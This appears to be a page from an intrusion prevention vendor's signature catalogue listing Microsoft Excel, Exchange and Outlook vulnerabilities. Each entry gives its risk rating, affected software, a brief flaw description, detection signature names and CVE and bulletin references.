HTTP_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
File-OLE_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution

References:

CVE-2007-3030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3030

BID-24803
http://www.securityfocus.com/bid/24803

OSVDB-35959
http://www.osvdb.org/35959

MS07-036
http://technet.microsoft.com/security/bulletin/MS07-036

Microsoft-Excel-Workspace-Index-Value-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the way Microsoft Excel processes files. The vulnerability is a result of insufficient data validation while processing an index value in a certain BIFF record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Excel will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-Binary_Microsoft-Excel-Workspace-Index-Value-Memory-Corruption

References:

CVE-2007-3890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3890

BID-25280
http://www.securityfocus.com/bid/25280

MS07-044
http://technet.microsoft.com/security/bulletin/MS07-044

Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-399-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

Vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
File-OLE_Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278

References:

CVE-2011-1278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1278

BID-48163
http://www.securityfocus.com/bid/48163

MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045

Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

Improper handling of ruleParameters tag in a DLP policy template causes a vulnerability in Microsoft Exchange Server. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution

References:

CVE-2021-26412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26412

Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the TNEF decoding in Microsoft Exchange and Outlook

Risk:

High

First detected in:

sgpkg-ips-54-1210

Last changed:

sgpkg-ips-1730-5242

Platform:

Windows

Software:

Exchange Server 5.0; Exchange Server 5.5; Exchange Server 2000; Microsoft Outlook

Type:

Buffer Overflow

Description:

Microsoft Exchange Server and Microsoft Outlook have a buffer overflow vulnerability in the handling of TNEF encoded messages. When a TNEF object record with a large size value is processed by these products, an integer overflow can occur. A remote attacker is able to exploit this vulnerability via a specially crafted email to execute arbitrary code on the victim machine.

Situation:

E-Mail_HCS-Microsoft-Exchange-And-Outlook-TNEF-Encoding
E-Mail_BS-Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
File-Binary_Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service

References:

CVE-2006-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0002

BID-16197
http://www.securityfocus.com/bid/16197

MS06-003
http://technet.microsoft.com/security/bulletin/MS06-003

Microsoft-Exchange-Approvedapplication-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization

References:

CVE-2023-36756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36756

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange detected

Risk:

High

First detected in:

sgpkg-ips-1383-5242

Last changed:

sgpkg-ips-1383-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Exchange Authentication Bypass CVE-2021-33766 detected.

Situation:

HTTP_CSH-Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766

References:

CVE-2021-33766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33766

Microsoft-Exchange-Calendar-Code-Execution

About this vulnerability:

Microsoft Exchange Calendar Code Execution

Risk:

Moderate

First detected in:

sgpkg-ips-86-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 2000; Exchange Server 2003

Type:

Buffer Overflow

Description:

Microsoft Exchange Server 2000 and 2003 remote compromise via malformed calendar object.

Situation:

E-Mail_BS-Microsoft-Exchange-Calendar-Code-Execution
IMAP_Microsoft-Exchange-Calendar-Code-Execution
POP3_CS-Microsoft-Exchange-Calendar-Code-Execution
File-TextId_Microsoft-Exchange-Calendar-Code-Execution

References:

CVE-2006-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0027

BID-17908
http://www.securityfocus.com/bid/17908

OSVDB-25338
http://www.osvdb.org/25338

MS06-019
http://technet.microsoft.com/security/bulletin/MS06-019

Microsoft-Exchange-CVE-2020-16875-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1280-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

A memory corruption vulnerability has been reported in Microsoft Exchange. The vulnerability is due to improper handling of due to improper validation of cmdlet arguments. An authenticated, remote attacker can exploit this vulnerability by running a particular cmdlet with crafted arguments against a vulnerable Exchange server. Successful exploitation could result in the execution of arbitrary commands as SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-RCE-Multiple-Vulnerabilities

References:

CVE-2020-16875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16875

ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep

Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1342-5242

Last changed:

sgpkg-ips-1342-5242

Platform:

Windows

Software:

Exchange Server

Type:

Directory Traversal

Description:

Improper handling of Offline Address Book stores causes an arbitrary file write vulnerability in Microsoft Exchange.

Situation:

HTTP_CRL-Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write

References:

CVE-2021-26858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858

Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1332-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

There exists an arbitrary file write vulnerability in Microsoft Exchange. Successful exploitation allows an attacker to write arbitrary file on the target server.

Situation:

HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write
HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write-2

References:

CVE-2021-27065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065

Microsoft-Exchange-Deserialization-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Exchange detected.

Situation:

File-TextId_Microsoft-Exchange-Deserialization-Remote-Code-Execution

References:

CVE-2021-42321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321

Microsoft-Exchange-Outlook-Compressed-RTF-Parsing-Memory-Corruption

About this vulnerability:

Maliciously crafted email could comproise vulnerable Outlook client

Risk:

High

First detected in:

sgpkg-ips-339-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook

Type:

Malfunction

Description:

A vulnerability in compressed RTF parsing allows remote attacker to craft malicious emails that could contain automatically executed malcode when opened via Outlook

Situation:

E-Mail_Compressed-TNEF-RTF-Memory-Corruption
File-Binary_Microsoft-Outlook-Compressed-TNEF-RTF-Memory-Corruption

References:

CVE-2010-2728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2728

MS10-064
http://technet.microsoft.com/security/bulletin/MS10-064

Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213

About this vulnerability:

A cross-site request forgery vulnerability in Microsoft Exchange Server

Risk:

Critical

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

There is a cross-site request forgery vulnerability in Microsoft Exchange Server.

Situation:

HTTP_SS-Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
File-Text_Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213

References:

CVE-2010-3213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3213

BID-41462
http://www.securityfocus.com/bid/41462

Microsoft-Exchange-OWA-XSS-Spoofing

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1661-5242

Platform:

Windows

Software:

Exchange Server 5.5

Type:

Cross-site Scripting

Description:

There is vulnerability in Microsoft Outlook Web Access, a component of Microsoft Exchange, in the validation of user input. This vulnerability could allow a malicious user to conduct cross-site scripting and spoofing attacks against other users of the web access service.

References:

CVE-2004-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0203

MS04-026
http://technet.microsoft.com/security/bulletin/MS04-026

Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange detected

Risk:

High

First detected in:

sgpkg-ips-1379-5242

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Exchange detected.

Situation:

HTTP_CRL-Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207-2

References:

CVE-2021-31207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207

Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Exchange detected

Risk:

High

First detected in:

sgpkg-ips-1379-5242

Last changed:

sgpkg-ips-1379-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Exchange detected.

Situation:

HTTP_CSU-Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523

References:

CVE-2021-34523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523

Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-21707

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1591-5242

Last changed:

sgpkg-ips-1599-5242

Platform:

Windows

Software:

Microsoft Exchange Server

Type:

Input Validation

Description:

Situation:

File-TextId_Microsoft-Exchange-Unsafe-Deserialization

References:

CVE-2023-21707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21707

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-36777

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1663-5242

Last changed:

sgpkg-ips-1663-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure in the security context of SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization

References:

CVE-2023-36777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36777

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1690-5242

Last changed:

sgpkg-ips-1690-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

Situation:

File-TextId_Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization

References:

CVE-2023-36035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36035

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-Exchange-PowerShell-Remoting-Command-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1607-5242

Last changed:

sgpkg-ips-1607-5242

Platform:

Windows

Software:

Microsoft Exchange Server

Type:

Input Validation

Description:

Improper validation of objects in the PowerShell Remoting feature causes a deserialization in vulnerability that can be exploited to execute arbitrary commands on the target system with system privileges.

Situation:

File-TextId_Microsoft-Exchange-Unsafe-Deserialization

References:

CVE-2023-32031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32031

Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1638-5242

Last changed:

sgpkg-ips-1638-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary file upload and in the worst case code execution under the security context of SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization

References:

CVE-2023-36744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36744

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

Situation:

File-TextId_Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization

References:

CVE-2023-36039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36039

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-Exchange-PowerShell-Remoting-Gsmwriter-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1672-5242

Last changed:

sgpkg-ips-1672-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in denial of service conditions or information disclosure in the context of SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization

References:

CVE-2023-38181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38181

ms23-aug
http://technet.microsoft.com/security/bulletin/ms23-aug

Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization

About this vulnerability:	A vulnerability in Microsoft Exchange Server
Risk:	Moderate
First detected in:	sgpkg-ips-1728-5242
Last changed:	sgpkg-ips-1728-5242
Platform:	Generic
Software:	Microsoft Exchange Server
Type:	Input Validation
Description:	Improper validation of objects in the PowerShell Remoting feature causes a vulnerability in Powershell. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	File-TextId_Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization

Microsoft-Exchange-Privilege-Escalation-Exploit

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exchange Server

Type:

Insecure Configuration

Description:

A vulnerability in Microsoft Exchange 2013 and 2016 which allows remote attackers to bypass authentication by forcing Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.

Situation:

HTTP_CRL-Microsoft-Exchange-Privilege-Escalation-Exploit

References:

CVE-2019-0724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0724

Microsoft-Exchange-Privilege-Escalation-Exploit-CVE-2018-8581

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-1308-5242

Last changed:

sgpkg-ips-1308-5242

Platform:

Generic

Software:

Exchange Server

Type:

Insecure Configuration

Description:

An elevation of privilege vulnerability exists in Microsoft Exchange Server which permits an attacker to gain access to a victims emails.

Situation:

HTTP_CRL-Microsoft-Exchange-Privilege-Escalation-Exploit

References:

CVE-2018-8581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8581

Microsoft-Exchange-ProxyShell-RCE

About this vulnerability:

A vulnerability in Microsoft Exchange Server devices.

Risk:

High

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

A vulnerability in Microsoft Exchange Server, versions 2013 CU23 < 15.0.1497.15, 2016 CU19 < 15.1.2176.12, 2016 CU20 < 15.1.2242.5, 2019 CU8 < 15.2.792.13, 2019 CU9 < 15.2.858.9, which allows remote attackers to execute arbitrary commands via an arbitrary file write utilizing user impersonation.

Situation:

HTTP_CRL-Microsoft-Exchange-ProxyShell-RCE

References:

CVE-2021-34473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473

Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1486-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper handling of EWS requests containing malicious UserConfiguration objects. This vulnerability is due to an incomplete fix of CVE-2021-42321. A remote, authenticated attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the security context of the SYSTEM user.

Situation:

File-TextId_Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization

References:

CVE-2022-23277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23277

ms22-mar
http://technet.microsoft.com/security/bulletin/ms22-mar

Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1455-5242

Last changed:

sgpkg-ips-1455-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

A information disclosure vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to a flaw in OneDriveProUtilities class. A remote, authenticated attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in information disclosure on the target server.

Situation:

File-TextId_Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection

References:

CVE-2022-24463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24463

ms22-mar
http://technet.microsoft.com/security/bulletin/ms22-mar

Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080

About this vulnerability:

An attempt to exploit a vulnerability in Exchange Server detected

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-41123.

Situation:

HTTP_CSU_Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080

References:

CVE-2022-41080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41080

Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1309-5242

Last changed:

sgpkg-ips-1309-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Exchange Server 2010. The vulnerability is due to improper handling of malicious EWS requests. An authenticated, remote attacker can exploit the vulnerability by sending crafted requests to the vulnerable Exchange server. Successful exploitation could result in the remote code execution in the context of the System user.

Situation:

File-TextId_Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization

References:

CVE-2020-17144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17144

ms20-dec
http://technet.microsoft.com/security/bulletin/ms20-dec

Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1310-5242

Last changed:

sgpkg-ips-1310-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of Filename argument in Export-ExchangeCertificate cmdlet. A remote, authenticated attacker can exploit this vulnerability by running ExchangeCertificate cmdlet with crafted arguments against a vulnerable Exchange server. Successful exploitation could result in arbitrary file write and can be leveraged to execute arbitrary codes as SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write

References:

CVE-2020-17083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17083

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Exchange-Server-ICalendar-DOS

About this vulnerability:

Null Pointer dereference in Exchange Server allows Denial of Service

Risk:

High

First detected in:

sgpkg-ips-107-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

There is a denial of service vulnerability in Microsoft Exchange Server, due to the way Microsoft Exchange Server handles calendar content requests, known asiCal. The vulnerability is a result of NULL pointer dereference when processing crafted iCalendar objects inside email messages. Successful exploitation of this vulnerability can allow a remote unauthenticated attacker to terminate the Microsoft Exchange Information Store service.

Situation:

SMTP_Microsoft-Exchange-Server-iCal-Denial-Of-Service

References:

CVE-2007-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0039

BID-23808
http://www.securityfocus.com/bid/23808

OSVDB-34391
http://www.osvdb.org/34391

MS07-026
http://technet.microsoft.com/security/bulletin/MS07-026

Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

Exchange Server

Type:

Input Validation

Description:

There exists a vulnerability in Microsoft Exchange Server, versions 2013 Cumulative Update 23, 2016 Cumulative Update 17 and 18, 2019 Cumulative Update 6 and 7, which allows remote attackers to execute arbitrary code due to the insufficient validation of arguments in ImportTransportRuleCollection cmdlet.

Situation:

HTTP_CRL-Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE

References:

CVE-2020-17117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17117

Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution

About this vulnerability:

Buffer overflow vulnerability in Microsoft Exchange Server

Risk:

Critical

First detected in:

sgpkg-ips-107-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Exchange Server. A remote unauthenticated attacker can exploit this vulnerability by sending an email message with malformed Base64 encoded MIME content to cause a denial of service or compromise the vulnerable system.

Situation:

SMTP_Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution

References:

CVE-2007-0213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0213

BID-23809
http://www.securityfocus.com/bid/23809

OSVDB-34391
http://www.osvdb.org/34391

MS07-026
http://technet.microsoft.com/security/bulletin/MS07-026

Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of Filename argument in New-ExchangeCertificate cmdlet. A remote, authenticated attacker can exploit this vulnerability by running the cmdlet with crafted arguments against a vulnerable Exchange server. Successful exploitation could result in denial-of-service conditions and in worst case execution of arbitrary codes as SYSTEM.

Situation:

File-TextId_Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write

References:

CVE-2020-17085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17085

ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov

Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection

About this vulnerability:

Script code injection vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-72-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server

Type:

Code Injection

Description:

Microsoft Exchange Server has a script code injection vulnerability. The vulnerability can be exploited by sending a crafted email message to the target server and persuading a target user to open the message using Outlook Web Access. When the vulnerability is triggered it leads to arbitrary script code execution in the security context of the client's browser.

Situation:

E-Mail_BS-Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
File-Text_Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection

References:

CVE-2006-1193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1193

BID-18381
http://www.securityfocus.com/bid/18381

OSVDB-26441
http://www.osvdb.org/26441

MS06-029
http://technet.microsoft.com/security/bulletin/MS06-029

Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1411-5242

Last changed:

sgpkg-ips-1411-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

There exists a reflected cross-site scripting vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary script code execution on the target browser.

Situation:

HTTP_CRL-Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting

References:

CVE-2021-41349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41349

Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1325-5242

Last changed:

sgpkg-ips-1325-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

There exists a server-side request forgery vulnerability in Microsoft Exchange Server. Successful exploitation could lead in remote code execution.

Situation:

HTTP_CSH-Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855

References:

CVE-2021-26855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855

Microsoft-Exchange-Sharedtyperesolver-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Windows

Software:

Microsoft Exchange Server

Type:

Input Validation

Description:

Situation:

File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization

References:

CVE-2023-36745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36745

Microsoft-Exchange-SSRF-CVE-2021-34473

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1510-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

A server side request forgery vulnerability has been reported in the EwsAutodiscoverProxyRequestHandler component of Microsoft Exchange. The vulnerability is due to insufficient handling of explicit logon requests to the autodiscover component of Exchange. An unauthenticated, remote attacker can exploit this vulnerability by sending a crafted request to the vulnerable Exchange server. Successful exploitation results in requests being made to backend servers with administrative privileges.

Situation:

HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473
